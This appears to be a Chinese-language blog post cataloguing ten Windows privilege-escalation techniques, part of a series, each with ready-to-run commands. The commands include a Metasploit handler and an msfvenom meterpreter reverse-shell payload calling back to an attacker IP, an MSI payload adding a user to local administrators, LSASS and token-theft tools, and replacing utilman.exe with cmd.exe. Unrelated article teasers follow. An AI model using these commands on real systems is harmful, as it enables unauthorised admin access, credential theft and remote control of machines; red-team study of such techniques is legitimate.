百种提权及手段一览系列第5集

embedded/2024/9/23 22:25:25/

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

截至目前,我们一共分享了29种提权方法,本期我们继续整理了10种热门提权方式,本期分享完后,我们一共分享了39种方法离100种方法也快完在1/3了,继续查收哟,:
1.Abusing Services via Autorun
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
In Metasploit (msf > prompt) 类型:use multi/handler
In Metasploit (msf > prompt) 类型:set payload windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) 类型:set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) 类型:run
打开另一个命令提示符并键入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
program.exe 放在 ‘C:\Program Files\Autorun Program’.

2.Abusing Services via AlwaysInstallElevated
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
msfvenom -p windows/exec CMD=‘net localgroup administrators user /add’ -f msi-nouac -o setup.msi
msiexec /quiet /qn /i C:\Temp\setup.msi
Or
SharpUp.exe AlwaysInstallElevated
批注:sharpup链接https://github.com/GhostPack/SharpUp
在这里插入图片描述

3.Abusing Services via SeCreateToken
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
!rmpriv

4.Abusing Services via SeDebug
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
Conjure-LSASS
Or
syscall_enable_priv 20

5.Remote Process via Syscalls (HellsGate|Hal操作系统Gate)
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
injectEtwBypass pid
批注:https://github.com/boku7/injectEtwBypass

6.Escalate With DuplicateTokenEx
域:Yes
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
PrimaryTokenTheft.exe pid
Or
TokenPlaye.exe –impersonate –pid pid
批注:
primarytokenthenft:https://github.com/slyd0g/PrimaryTokenTheft
tokenplaye:https://github.com/S1ckB0y1337/TokenPlayer/releases/tag/v0.8

7.Abusing Services via SeIncreaseBasePriority
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
start /realtime SomeCpuIntensiveApp.exe
批注:
找了一圈,只有这儿有相关内容:https://github.com/gtworek/Priv2Admin

8.Abusing Services via SeManageVolume
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
只需编译并运行SeManageVolumeAbuse

批注:https://github.com/xct/SeManageVolumeAbuse

9.Abusing Services via SeRelabel
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
WRITE_OWNER对资源的访问权限,包括文件和文件夹。
Run for privilege escalation

10.Abusing Services via SeRestore
域:No
Local Admin: Yes
操作系统: Windows
类型: Abuse Privilege
方法:
启动具有 SeRestore 权限的 PowerShell/ISE.
使用Enable-SeRestorePrivilege 启用权限.
将utilman.exe重命名为utilman.old
将cmd.exe重命名为utilman.exe
锁定控制台并按Win+U


http://www.ppmy.cn/embedded/15304.html

相关文章

重磅!这本8.8分的Q1 On Hold期刊,或将迎来转机!

【SciencePub学术】低分期刊由于质量问题被On Hold很常见,但是高分期刊也被On Hold,那就值得警惕了。 小编最近听到风声,目前位于On Hold期刊之列,但影响因子最高的 chemosphere 或迎来转机! 图源:网络 …

第十五届蓝桥杯省赛第二场C/C++B组F题【狡兔k窟】题解(AC)

题意分析 有一个 n n n 个点, n − 1 n-1 n−1 条边的无向图,边权均为 1 1 1。 每个点隶属于一个集合,同一个集合的点可以互相传送。 给定 m m m 个询问,求 x , y x, y x,y 的最短距离。 最短路解法 步骤: 建…

Java,Python和Go语言语法差异对比

前段时间一直在找工作,比较颓废,很长时间都没有更新博客了,最近公司的项目需要用到Python语言和Go语言, 所以又重新学习了一下Python语言和Go语言,现在做一些总结,方便以后复习使用,同时也给其他…

go 这样做就是python

代码 package mainimport "fmt"func main() {var list []interface{}list append(list, 1, 2, 3)list append(list, "d", "d", 3.0)fmt.Println(list, "这是一个万能类型列表,这就是python")dict : map[interface{}]interface{}{&q…

AI预测体彩排列3第2套算法实战化测试第3弹2024年4月25日第3次测试

今天继续进行新算法的测试,今天是第3次测试。好了,废话不多说了,直接上图上结果。 2024年4月25日体彩排3预测结果 6码定位方案如下: 百位:4、5、3、6、1、0 十位:6、5、4、3、1、0 个位:6、2、7…

HBase安装部署

Apache HBase是按列存储数据的NoSQL类型数据库,其数据文件是存储在Hadoop集群中,支持数据以及服务的高可用性以及支持集群节点的大规模可扩展性,本文主要描述HBase的安装部署。 如上所示,HBase的总体架构,HBase Master…

小程序中fit格式等运动数据文件怎样实现可视化

要在小程序中实现 FIT(Flexible and Interoperable Data Transfer)格式等运动数据文件的可视化,主要涉及到三个步骤:解析 FIT 文件、处理数据、以及数据可视化。下面是一个简化的流程和一些建议: 1. 解析 FIT 文件 F…

麒麟龙芯loongarch64 electron 打包deb包

在麒麟龙芯(loongarch64)电脑上 使用electron 开发桌面应用。之前用electron-packager 打包出来的是文件夹 是 unpack 包。现在需要打包deb包,依据开发指南开始打包。 在项目文件夹下 打开终端 输入 npm run packager 先打包unpack包 然后…